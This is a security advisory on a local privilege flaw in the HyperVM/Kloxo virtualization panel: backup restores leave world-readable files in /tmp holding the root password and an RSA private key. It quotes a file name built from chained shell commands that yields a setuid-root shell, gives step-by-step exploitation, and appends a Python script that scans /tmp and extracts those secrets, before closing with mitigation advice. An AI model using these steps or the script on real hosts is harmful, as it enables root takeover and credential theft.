HyperVM File Permissions Local Vulnerability
Source: XiaShing[at]gmail.com  Author: XiaShing  Published: 2009-08-26

HyperVM is a virtualization control panel that runs on a host node and provisions
several Virtual Private Servers from it. There is a previously unreported vulnerability in
HyperVM/Kloxo.

It was originally documented in ISSUE 14 by an anonymous author:
http://www.milw0rm.com/exploits/8880

That post showed how a root shell can be created: the file name in the listing below is a
sequence of shell commands, and the setuid-root 'shell' binary next to it is the result:

 [user1@testing574 tmp]$ ls -al
 total 28
 drwxrwxrwt  4 root  root  4096 May 21 08:41 .
 drwxr-xr-x 24 root  root  4096 May 19 16:57 ..
 -rw-rw-r--  1 user1 user1    0 May 21 08:40 ;cd ..;chown root.root shell;chmod 4755 shell;
 drwx------  2 root  root  4096 May 21 08:41 backupPdUzR4
 -rwsr-xr-x  1 root  root  5056 May 21 08:41 shell
 -rw-rw-r--  1 user1 user1   89 May 21 08:33 shell.c

That trick is unnecessary, though, because a 'restore from backup' in HyperVM already creates
a folder like "backupPdUzR4" under /tmp, and what is inside it is enough on its own.

Let's take a look at it... On a VM I tested, even the directory itself was readable:
$ ls -lha /tmp/backupfileIy00MO/
total 36K
drwxr-xr-x 2 root root 4.0K Dec 12 02:18 .
drwxr-xr-x 3 root root 4.0K Dec 12 10:37 ..
-rw-r--r-- 1 root root  15K Dec 12 00:46 hypervm.file
-rw-r--r-- 1 root root  11K Dec 12 00:46 hypervm.metadata

Both files are world-readable, and hypervm.file holds the root password in plain text, along with the username, an RSA private key and a lot more.

The VM type is shown first; it appears to be OpenVZ. The file is PHP serialize() output, so every field is a length-prefixed string, array or null:
$ cat hypervm.file
al_list";a:0:{}s:13:"__object_list";N;s:9:"subaction";N;s:8:"dbaction";s:5:"clean";s:12:"metadbaction";s:3:"all";s:7:"__class";s:11:"vps__openvz";

--snip--
Private keys! (The text_public_key field that follows actually holds an X.509 certificate rather than a bare public key.)
"hostname";s:8:"fakevps";s:12:"username";s:10:"fakeusername";s:16:"text_private_key";s:887:"-----BEGIN RSA PRIVATE KEY-----
--snip--
-----END RSA PRIVATE KEY-----
";s:15:"text_public_key";s:1188:"-----BEGIN CERTIFICATE-----
BIIDfPzCCAqigAwIBAgIBADANBgkqhkiG9w0BAQUFADB5MRMwEQYDNQDEwpseGxh
YnMuY29tMQswCQYDVQQGEwJJTjELMAkGA1UECBMCaW4xCzAJBgNVBAcTAmluMQsw
CQYDVQQKEwJseDENMAsGA1UECxMEc29mdDEfMB0GCSqGSIb3DQEJAUYQYWRtaW5A
bHhsYWJzLmNvbTAeFw0wOTA2MTExMzAyNDdaFw0xMDA2MTExMzAyNDdaMHkxEzAR
BgNVBAMTCmx4bGFicy9jb20xCzAJBgNVBAYTAklOMQswCQYDVQQIEwJpbjELMAkG
Z2UEBxMCaW4xCzAJBgNVBAoTAmx4MQ0wCwYDVQQLEwRzb3Z0MR8wHQYJKoZIhvcN
AQkBFhBhZG1pbkBseGxhYnMuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB
gQDdehG9ScmFWL2AZHeXqm2oljMRbyic7dlfGv9E3tMyWgWCSnF9dJ/gI+NoY1yg
ic52NJEAB1/blDtZMDnx3ze4wf79p9rGzAuT5N+yKqleMdlwozQCLf17blSAQAXP
i94Sy95huIMR9vZ/fPDOi7ucHWSk8aaqVI5JY7QpSewoVQIDAQABo4KWMIHTMB0G
A1UdDgQWBBRMXffyd+fJWt/iYe1jteuLL8UukzCBowYDVR0jBIGbMIGYgBRMXffy
d+fJWt/iYe1jteuLL8Uuk6F9pHsweTETMBEGA1UEAxMKbHhsYWJzLmNvbTELMAkG
A1UEBhMCSU4xCzAJBgNVBAgTAmluMQswCQYDVQQHEwJpbjELMAkGA1UEChMCbHgx
DTALBgNVBAsTBHNvZnQxHzAdBgkqhkiG9w0BCQEWEGFkbWluQGx4bGIicy5jb22C
AQAwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOBgQCQnz/9DIzn5CVItRwk
HHMZBLlq3MtmQYmwGuNjiss3UkYC1ehi9LDLfQ4AzJfjUrvBpuksozdfvYlpXnA1
LAmOniBgyZW0aUStSrSr4czva4d3VMyOqQ/Dgr//i+RSuo4QH+6wI0G/oirE+E6b
uR24why0WWPNsyJU3adesPo4eQf==
-----END CERTIFICATE-----

--snip--
Root passwords!
sable_reason";s:0:"";s:11:"createstage";s:0:"";s:13:"createmessage";s:0:"";s:12:"rootpassword";s:21:"xxxxxxxxxxxxxxxxxxxx";s:20:"rootpassword_changed";s

So in summary, here are the exploitation steps:
1. Log into HyperVM/Kloxo.
2. Click "Backup Home".
3. In the field labeled "Restore from file", browse for any restore file in the popup box.
4. Wait until the VM has finished restoring from backup.
5. Log into the restored VM as any unprivileged user. If root hasn't deleted /tmp/backupXXXXXX before bringing up the network interface, read /tmp/backupXXXXXX/hypervm.file and you win.
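To make the hypervm.file fragments above and the read in step 5 concrete, here is an added example in Python. It is mine, not code from the advisory or from HyperVM/Kloxo: a minimal parser for the PHP serialize() format hypervm.file is written in, a walk that pulls out the fields shown leaking (username, rootpassword, text_private_key, text_public_key), and the check an unprivileged login would run for step 5, namely which /tmp/backup*/hypervm.file it can read. The serialized sample inside is constructed from the field names in the dump with fake values; the directory name backupIy00MO and the file name come from the ls output above, and demo() stages them in a temporary directory so the script runs offline. PHP objects (O:) are not handled, since the dump is array-based.

```python
#!/usr/bin/env python3
"""Added example; not code from the advisory or from HyperVM/Kloxo.
hypervm.file is a PHP serialize() stream, so a short parser is enough to pull
out the leaking fields. SAMPLE is constructed (field names from the advisory's
dump, fake values); the /tmp/backup*/hypervm.file layout is from its ls output."""
import os
import tempfile

# Field names seen in the advisory's hypervm.file dump.
SENSITIVE = ("username", "rootpassword", "text_private_key", "text_public_key")


def php_unserialize(data: bytes):
    """Minimal PHP unserialize() for N, b, i, d, s and a (no O: objects). Input
    stays bytes because PHP string lengths count bytes, not characters."""
    pos = 0

    def parse():
        nonlocal pos
        tag = data[pos:pos + 1]
        if tag == b"N":                                   # N;
            pos += 2
            return None
        if tag in (b"b", b"i", b"d"):                     # i:42;  b:1;  d:1.5;
            end = data.index(b";", pos)
            raw = data[pos + 2:end]
            pos = end + 1
            return {b"b": lambda v: v == b"1", b"i": int, b"d": float}[tag](raw)
        if tag == b"s":                                   # s:<len>:"<bytes>";
            colon = data.index(b":", pos + 2)
            length = int(data[pos + 2:colon])
            start = colon + 2
            pos = start + length + 2
            return data[start:start + length].decode("utf-8", "replace")
        if tag == b"a":                                   # a:<n>:{key value ...}
            colon = data.index(b":", pos + 2)
            count = int(data[pos + 2:colon])
            pos = colon + 2
            result = {}
            for _ in range(count):
                key = parse()
                result[key] = parse()
            pos += 1                                      # closing brace, no ';'
            return result
        raise ValueError(f"unsupported tag {tag!r} at offset {pos}")

    return parse()


def find_secrets(value, path=""):
    """Yield (dotted path, value) for each non-empty SENSITIVE field, recursing
    into nested arrays so a whole VM list in one file is covered."""
    if isinstance(value, dict):
        for key, item in value.items():
            here = f"{path}.{key}" if path else str(key)
            if key in SENSITIVE and item:
                yield here, item
            yield from find_secrets(item, here)


def readable_backup_files(tmp="/tmp"):
    """Step 5 from the unprivileged side: every <tmp>/backup*/hypervm.file the
    current user can read. Anything in the list is exposed."""
    hits = []
    for name in sorted(os.listdir(tmp)):
        path = os.path.join(tmp, name, "hypervm.file")
        if name.startswith("backup") and os.access(path, os.R_OK):
            hits.append(path)
    return hits


def _s(value: bytes) -> bytes:
    """PHP serialize() of one string; only used to build the constructed sample."""
    return b's:%d:"%s";' % (len(value), value)


# Constructed sample shaped like the advisory's dump; every value here is fake.
SAMPLE = (b"a:8:{" + _s(b"__class") + _s(b"vps__openvz")
          + _s(b"__object_list") + b"N;"
          + _s(b"hostname") + _s(b"fakevps")
          + _s(b"username") + _s(b"fakeusername")
          + _s(b"text_private_key")
          + _s(b"-----BEGIN RSA PRIVATE KEY-----\nFAKE\n-----END RSA PRIVATE KEY-----")
          + _s(b"text_public_key") + b"N;"
          + _s(b"rootpassword") + _s(b"Hunter2-fake!")
          + _s(b"rootpassword_changed") + b"i:0;" + b"}")


def demo():
    """Stage a fake /tmp (one backup dir, one unrelated dir) and read it back
    the way an unprivileged login on the restored VM would."""
    with tempfile.TemporaryDirectory() as tmp:
        for sub in ("backupIy00MO", "not-a-backup"):
            os.makedirs(os.path.join(tmp, sub))
            with open(os.path.join(tmp, sub, "hypervm.file"), "wb") as fh:
                fh.write(SAMPLE)
        files = readable_backup_files(tmp)
        leaked = {}
        for path in files:
            with open(path, "rb") as fh:
                leaked.update(find_secrets(php_unserialize(fh.read())))
        return {"files": len(files), "leaked": leaked}
```

Run demo() for the offline walkthrough; on a freshly restored VM, calling readable_backup_files() with its default /tmp as an unprivileged user is the quick check, and an empty list is what the mitigation should produce. The parser deliberately keeps byte offsets rather than decoding up front, because a single multi-byte character in a hostname would otherwise shift every later field.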

Mitigation:
After the VM is restarted, delete these files as the root user before anyone else can read them (chmod 0700 on the directory first if you cannot delete it immediately). Anything that sat in /tmp/backupXXXXXX while unprivileged users had access, the root password and the private key included, should be treated as compromised and rotated.

Regards,
Xia Shing Zee

